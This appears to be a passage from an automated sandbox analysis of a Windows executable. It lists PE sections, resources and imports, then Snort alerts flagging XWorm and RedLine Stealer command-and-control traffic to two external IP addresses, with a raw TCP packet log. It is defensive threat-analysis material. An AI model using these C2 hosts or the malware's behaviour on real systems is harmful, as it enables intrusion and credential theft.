IMAGE_DIRECTORY_ENTRY_RESOURCE	0x264000	0x221a2	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x250000	0x1368c	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x287000	0x5ec	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x216600	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x216800	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2164c0	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x198000	0x818	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6fef8	0x70000	dd316bc2c65b1ae399457fdba120fa82	False	0.45282200404575895	data	6.641185225824904	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.managed	0x71000	0xd9b18	0xd9c00	74b435642e339cdb1b2a678eb60c92d8	False	0.4628401711394948	data	6.464502436229499	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
hydrated	0x14b000	0x4c540	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x198000	0xa89e4	0xa8a00	2df152bc84a6c95ebb2a7c56d196a9b4	False	0.4893077626945886	data	6.721004295876767	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x241000	0xe668	0x1a00	f7893d3998d6fe23c3c2fd83a455cf8d	False	0.22581129807692307	data	3.2697501080046183	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x250000	0x1368c	0x13800	e5aeded247d82c5d18901a5f5b1c4999	False	0.49800931490384615	data	6.163194359627306	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x264000	0x221a2	0x22200	3f723e282a86eae269d38ab8b2a0b55f	False	0.38326322115384615	data	5.7811025092062795	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x287000	0x5ec	0x600	22b17bd43d0ff4894ef88b7e105d8348	False	0.5989583333333334	data	5.299377162126531	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
BINARY	0x26426c	0x9494	data	1.0005521085287623
RT_ICON	0x26d700	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m	0.2649377593360996
RT_ICON	0x26fca8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	0.3646810506566604
RT_ICON	0x270d50	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m	0.5549645390070922
RT_ICON	0x2711b8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2834 x 2834 px/m	0.18115257439773264
RT_ICON	0x2753e0	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2834 x 2834 px/m	0.0959718443156276
RT_GROUP_ICON	0x285c08	0x4c	data	0.7631578947368421
RT_VERSION	0x285c54	0x364	data	0.38018433179723504
RT_MANIFEST	0x285fb8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
ADVAPI32.dll	AdjustTokenPrivileges, CreateWellKnownSid, DeregisterEventSource, DuplicateTokenEx, GetSecurityDescriptorLength, GetTokenInformation, GetWindowsAccountDomainSid, LookupPrivilegeValueW, OpenProcessToken, OpenThreadToken, RegCloseKey, RegCreateKeyExW, RegDeleteKeyExW, RegDeleteTreeW, RegDeleteValueW, RegEnumKeyExW, RegEnumValueW, RegFlushKey, RegOpenKeyExW, RegQueryInfoKeyW, RegQueryValueExW, RegSetValueExA, RegSetValueExW, RegisterEventSourceW, ReportEventW, RevertToSelf, SetThreadToken
bcrypt.dll	BCryptDestroyKey, BCryptEncrypt, BCryptGenRandom, BCryptOpenAlgorithmProvider, BCryptSetProperty, BCryptDecrypt, BCryptCloseAlgorithmProvider, BCryptImportKey
KERNEL32.dll	TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, EncodePointer, RaiseException, RtlPcToFileHeader, AllocConsole, CancelThreadpoolIo, CloseHandle, CloseThreadpoolIo, CompareStringEx, CompareStringOrdinal, CopyFileExW, CreateDirectoryW, CreateEventExW, CreateFileW, CreateProcessA, CreateSymbolicLinkW, CreateThreadpoolIo, DeleteCriticalSection, DeleteFileW, DeleteVolumeMountPointW, DeviceIoControl, DuplicateHandle, EnterCriticalSection, EnumCalendarInfoExEx, EnumTimeFormatsEx, ExitProcess, ExpandEnvironmentStringsW, FileTimeToSystemTime, FindClose, FindFirstFileExW, FindNLSStringEx, FindNextFileW, FindStringOrdinal, FlushFileBuffers, FormatMessageW, FreeConsole, FreeLibrary, GetCPInfo, GetCalendarInfoEx, GetConsoleOutputCP, GetConsoleWindow, GetCurrentProcess, GetCurrentProcessId, GetCurrentProcessorNumberEx, GetCurrentThread, GetDynamicTimeZoneInformation, GetEnvironmentVariableW, GetFileAttributesExW, GetFileInformationByHandle, GetFileInformationByHandleEx, GetFileType, GetFinalPathNameByHandleW, GetFullPathNameW, GetLastError, GetLocaleInfoEx, GetLogicalDrives, GetLongPathNameW, GetModuleFileNameW, GetModuleHandleA, GetOverlappedResult, GetProcAddress, GetStdHandle, GetSystemDirectoryW, GetSystemTime, GetThreadPriority, GetTickCount64, GetTimeZoneInformation, GetUserPreferredUILanguages, GetVolumeInformationW, InitializeConditionVariable, InitializeCriticalSection, IsDebuggerPresent, LCMapStringEx, LeaveCriticalSection, LoadLibraryExW, LocalAlloc, LocalFree, LocaleNameToLCID, MoveFileExW, MultiByteToWideChar, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseFailFastException, ReadFile, RemoveDirectoryW, ReplaceFileW, ResetEvent, ResolveLocaleName, ResumeThread, SetEvent, SetFileAttributesW, SetFileInformationByHandle, SetLastError, SetThreadErrorMode, SetThreadPriority, Sleep, SleepConditionVariableCS, StartThreadpoolIo, SystemTimeToFileTime, TzSpecificLocalTimeToSystemTime, VirtualAlloc, VirtualFree, WaitForMultipleObjectsEx, WakeConditionVariable, WideCharToMultiByte, WriteFile, FlushProcessWriteBuffers, WaitForSingleObjectEx, RtlVirtualUnwind, RtlCaptureContext, RtlRestoreContext, VerSetConditionMask, AddVectoredExceptionHandler, FlsAlloc, FlsGetValue, FlsSetValue, CreateEventW, SwitchToThread, CreateThread, GetCurrentThreadId, SuspendThread, GetThreadContext, SetThreadContext, QueryInformationJobObject, GetModuleHandleW, GetModuleHandleExW, GetProcessAffinityMask, VerifyVersionInfoW, InitializeContext, GetEnabledXStateFeatures, SetXStateFeaturesMask, VirtualQuery, GetSystemTimeAsFileTime, InitializeCriticalSectionEx, DebugBreak, WaitForSingleObject, SleepEx, GlobalMemoryStatusEx, GetSystemInfo, GetLogicalProcessorInformation, GetLogicalProcessorInformationEx, GetLargePageMinimum, VirtualUnlock, VirtualAllocExNuma, IsProcessInJob, GetNumaHighestNodeNumber, GetProcessGroupAffinity, K32GetProcessMemoryInfo, RtlUnwindEx, InitializeSListHead, IsProcessorFeaturePresent, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RtlLookupFunctionEntry
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CoUninitialize, CoWaitForMultipleHandles, CoInitializeEx, CoCreateGuid, CoGetApartmentType
USER32.dll	LoadStringW
api-ms-win-crt-math-l1-1-0.dll	__setusermatherr, floor, pow, modf, sin, cos, ceil, tan
api-ms-win-crt-heap-l1-1-0.dll	free, calloc, _set_new_mode, malloc, _callnewh
api-ms-win-crt-string-l1-1-0.dll	strncpy_s, strcpy_s, _stricmp, wcsncmp, strcmp
api-ms-win-crt-convert-l1-1-0.dll	strtoull
api-ms-win-crt-runtime-l1-1-0.dll	_register_thread_local_exe_atexit_callback, _c_exit, _cexit, __p___wargv, __p___argc, _exit, exit, _initterm_e, terminate, _crt_atexit, _initterm, _register_onexit_function, _get_initial_wide_environment, abort, _initialize_onexit_table, _initialize_wide_environment, _configure_wide_argv, _seh_filter_exe, _set_app_type
api-ms-win-crt-stdio-l1-1-0.dll	__stdio_common_vsscanf, __p__commode, __acrt_iob_func, __stdio_common_vfprintf, __stdio_common_vsprintf_s, _set_fmode
api-ms-win-crt-locale-l1-1-0.dll	_configthreadlocale

Exports

Name	Ordinal	Address
DotNetRuntimeDebugHeader	1	0x140241d50

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
06/29/24-10:02:21.884350	TCP	2852870	ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes	7725	49735	195.10.205.94	192.168.2.4
06/29/24-10:02:19.175598	TCP	2853191	ETPRO TROJAN Win32/XWorm V3 CnC Command - savePlugin Inbound	7725	49735	195.10.205.94	192.168.2.4
06/29/24-10:02:27.411951	TCP	2043231	ET TROJAN Redline Stealer TCP CnC Activity	49744	1913	192.168.2.4	209.90.234.57
06/29/24-10:02:20.542353	TCP	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	1913	49744	209.90.234.57	192.168.2.4
06/29/24-10:02:25.769086	TCP	2046056	ET TROJAN Redline Stealer/MetaStealer Family Activity (Response)	1913	49744	209.90.234.57	192.168.2.4
06/29/24-10:02:20.378795	TCP	2046045	ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	49744	1913	192.168.2.4	209.90.234.57
06/29/24-10:02:18.982376	TCP	2853192	ETPRO TROJAN Win32/XWorm V3 CnC Command - sendPlugin Outbound	49735	7725	192.168.2.4	195.10.205.94
06/29/24-10:02:21.884350	TCP	2852874	ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2	7725	49735	195.10.205.94	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 29, 2024 10:02:17.465559959 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:17.470386028 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:17.470474958 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:17.573776960 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:17.578573942 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.253843069 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.276122093 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.276154041 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.276164055 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.276192904 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.276254892 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.276293039 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.276303053 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.276312113 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.276320934 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.276346922 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.276379108 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.276388884 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.276398897 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.276448965 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.281146049 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.281198978 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.281384945 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.369595051 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.369604111 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.369613886 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.369663954 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.369741917 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.369751930 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.369793892 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.369956017 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.369966030 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.369975090 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.370018005 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.370047092 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.370055914 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.370100021 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.370800018 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.370811939 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.370821953 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.370862007 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.370919943 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.370929956 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.370978117 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.371617079 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.371625900 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.371635914 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.371669054 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.371697903 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.371699095 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.371709108 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.371764898 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.372416973 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.413290024 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.464529991 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.464539051 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.464546919 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.464572906 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.464591980 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.464627981 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.464628935 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.464638948 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.464648962 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.464682102 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.464687109 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.464926004 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.464986086 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.465039015 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.465049982 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.465075016 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.465094090 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.465132952 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.465140104 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.465150118 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.465158939 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.465167999 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.465208054 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.465245008 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.465969086 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.466007948 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.466016054 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.466053009 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.466089964 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.466099977 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.466108084 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.466123104 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.466157913 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.466445923 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.466960907 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.466986895 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.467020988 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.467030048 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.467067003 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.467134953 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.467147112 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.467174053 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.467187881 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.467195034 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.467197895 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.467216015 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.467246056 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.467931032 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.467947006 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.467977047 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.467993021 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.468077898 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.468087912 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.468096972 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.468106031 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.468146086 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.468149900 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.468422890 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.555313110 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.557982922 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.558036089 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.558046103 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.558051109 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.558123112 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.558131933 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.558140993 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.558151007 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.558178902 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.558214903 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.558250904 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.558260918 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.558269024 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.558278084 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.558286905 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.558295965 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.558304071 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.558336973 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.558336973 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.558454037 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.558486938 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.558495998 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.558595896 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.558605909 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.558619022 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.558628082 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.558645010 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.558672905 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.558676004 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.558686972 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.558696032 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.558727026 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.558756113 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.651721001 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.651730061 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.651735067 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.651792049 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.651799917 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.651833057 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.651870966 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.651962042 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.651972055 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.651982069 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.651988983 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.652019024 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.652049065 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.652091980 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.652168989 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.652178049 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.652192116 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.652235985 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.652266026 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.652396917 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.652435064 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.652445078 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.652508974 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.652523041 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.652532101 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.652540922 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.652581930 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.652802944 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.652858019 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.652868032 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.652911901 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.652954102 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.652962923 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.652972937 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.652982950 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.653007984 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.653036118 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.653086901 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.653096914 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.653105021 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.653120041 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.653130054 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.653140068 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.653156996 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.653184891 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.653774023 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.653827906 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.653839111 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.653925896 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.653937101 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.653947115 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.653958082 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.653961897 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.653990030 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.654017925 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:18.654089928 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.654102087 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.654112101 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.654123068 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:18.654133081 CEST	7725	49735	195.10.205.94	192.168.2.4
